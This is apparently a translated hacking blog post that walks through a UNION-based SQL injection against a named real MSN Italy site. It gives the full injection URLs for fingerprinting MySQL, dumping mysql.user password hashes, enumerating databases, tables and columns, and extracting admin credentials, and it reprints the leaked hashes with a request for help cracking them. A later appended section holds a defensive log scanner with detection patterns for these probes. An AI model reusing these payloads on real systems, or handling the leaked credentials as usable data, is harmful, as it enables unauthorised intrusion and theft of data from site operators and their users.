Author: UpFonT
Reference address: http://upfont.blogbus.com/logs/37867077.html
An hour ago, Gh0u1 sent me a link, saying it was an MSN site, and I thought there might be some new technical article to share. Wrong ~ Once you go in you see numbers like 1, 2, 3, 4, 5 ~ Look at the URL: it's actually an injection point ~ Scary ~ I later learned he had seen it posted on a foreign forum. Curious, let's take a look. I can't remember everything exactly ~ (my memory has been very bad recently).
First, here is the address that was given:
http://benessere.it.msn.com/gallery/-1 union select 1,2,4,5,6,7,8,9,10,11 --/casalinghe-perfette-10-mosse-.html
The page echoes the numbers, including 11 ~~ so we can start using statements to find out the database type. I tried MySQL first, replacing the echoed column with concat_ws(0x3a, user(), @@version, database()). The complete statement is:
http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,user(),@@version,database()),3,4,5,6,7,8,9,10,11 --/casalinghe-perfette-10-mosse-.html
The page returns the user, version and database name joined by colons: mysql@localhost:5.0.22:progr
It really showed up ~ so it is MySQL 5.0.22 ~ Next, let's look at cross-database reads ~ The statement is:
http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,User,Password,Host),3,4,5,6,7,8,9,10,11+from+mysql.user --/casalinghe-perfette-10-mosse-.html
Then you can see a readable row:
root:7687543e5d021f1c:localhost
Are there other users? I tried it with LIMIT:
http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,User,Password,Host),3,4,5,6,7,8,9,10,11+from+mysql.user+limit+1,30 --/casalinghe-perfette-10-mosse-.html
Er ~ why is it now root:7687543e5d021f1c:donna.sanihelp.it? Going through all the users in sequence gives:
root:7687543e5d021f1c:localhost
root:7687543e5d021f1c:donna.sanihelp.it
donnamsn:1558b7da73ad0249:%
mysql:659764293f6714cc:localhost
concorsi:7b1df5aa33eb7d2c:localhost
Unfortunately, none of them could be cracked ~ (Microsoft is no pushover ~ they always use strong passwords ~)
Fruitless ~
Then I checked information_schema.SCHEMATA in the same way to find out which databases it had:
http://benessere.it.msn.com/gallery/-1 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11+from+information_schema.SCHEMATA+limit+ --/casalinghe-perfette-10-mosse-.html
12allnew
SLAVEFILE
Test
Alimenti
Concorsi
Contatti
Contenui
Dieta_on_line
DrAnswer
Farmaci
Gallery
Lavoro
Mailinglist
Mysql
Newsletter_msn
Nomi
Progr
Quiz
Sondaggi
Strutture
Terme
Viaggi
(~ Only for learning.)
Next, information_schema.TABLES:
http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,TABLES_NAME,TABLE_SCHEMA),3,4,5,6,7,8,9,10,11+from+information_schema.Tables+limit+1,30 --/casalinghe-perfette-10-mosse-.html
I had a problem here ~ (gurus, please advise ~ I'm slow)
Then we know the table name to note down ~~ then we go looking for the important one.
Next is the COLUMNS table ~ The method for learning a table's field names is the same as above ~ change it yourself ~
http://benessere.it.msn.com/gallery/-1 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10,11+from+information_schema.COLUMNS+where+TABLE_NAME=char(49,50,97,108,108,95,97,100,109,105,110,95,98,95,108,111,103)+limit+ --/casalinghe-perfette-10-mosse-.html
This tells us the columns are:
Id
User
Pass
Then ~
http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,user,pass),3,4,5,6,7,8,9,10,11+from+12allnew.12all_admin_b_log+limit+8,30 --/casalinghe-perfette-10-mosse-.html
OK !~ We have the username and password, but I don't know how to crack it ~
Can anyone help me ~ crack it ~
That's all.
Thanks, everyone.
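From the defender's side, the probes in this post leave a very recognisable trail in the web server's access log. The following is an added example (not code from the original post or from the site it describes) that flags the UNION SELECT, information_schema, mysql.user, concat_ws() and char() patterns used above in constructed Common Log Format lines; the log lines, client addresses and request paths are all made up for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original post).
# The request paths mimic the /gallery/<id> pattern that was probed above.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:10:00:01 +0000] "GET /gallery/123/casalinghe.html HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:10:00:05 +0000] "GET /gallery/-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20--/x.html HTTP/1.1" 200 4096
203.0.113.7 - - [10/Oct/2023:10:00:09 +0000] "GET /gallery/-1+union+select+1,concat_ws(0x3a,User,Password,Host),3+from+mysql.user+limit+1,30+--/x.html HTTP/1.1" 200 4100
203.0.113.7 - - [10/Oct/2023:10:00:12 +0000] "GET /gallery/-1+union+select+1,COLUMN_NAME,3+from+information_schema.COLUMNS+where+TABLE_NAME=char(49,50)+--/x.html HTTP/1.1" 200 4100
198.51.100.4 - - [10/Oct/2023:10:01:00 +0000] "GET /gallery/45/union-city-photos.html HTTP/1.1" 200 6000
"""

# Common Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Indicators for the techniques walked through in the post. Each pattern is
# applied to the URL-decoded, lower-cased path, so '+' / '%20' encodings and
# case changes do not evade it; the '\b' keeps "union-city" from matching.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("information_schema", re.compile(r"\binformation_schema\s*\.")),
    ("mysql_user_table", re.compile(r"\bmysql\s*\.\s*user\b")),
    ("concat_ws_probe", re.compile(r"\bconcat_ws\s*\(")),
    ("char_encoding", re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)")),
    ("version_probe", re.compile(r"@@version|\bversion\s*\(\s*\)")),
]

def normalize(path: str) -> str:
    # Decode twice so a single layer of double-encoding is also caught.
    return unquote_plus(unquote_plus(path)).lower()

def scan_request(path: str) -> list:
    """Return the names of all indicators that fire on one request path."""
    decoded = normalize(path)
    return [name for name, rx in INDICATORS if rx.search(decoded)]

def scan_log(text: str) -> list:
    """Return (ip, path, [indicators]) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = scan_request(m.group("path"))
        if hits:
            findings.append((m.group("ip"), m.group("path"), hits))
    return findings
```

Running scan_log(SAMPLE_LOG) reports the three probing requests from 203.0.113.7 with the indicators each one tripped, while the two ordinary gallery requests (including the one whose slug merely contains the word "union") produce nothing.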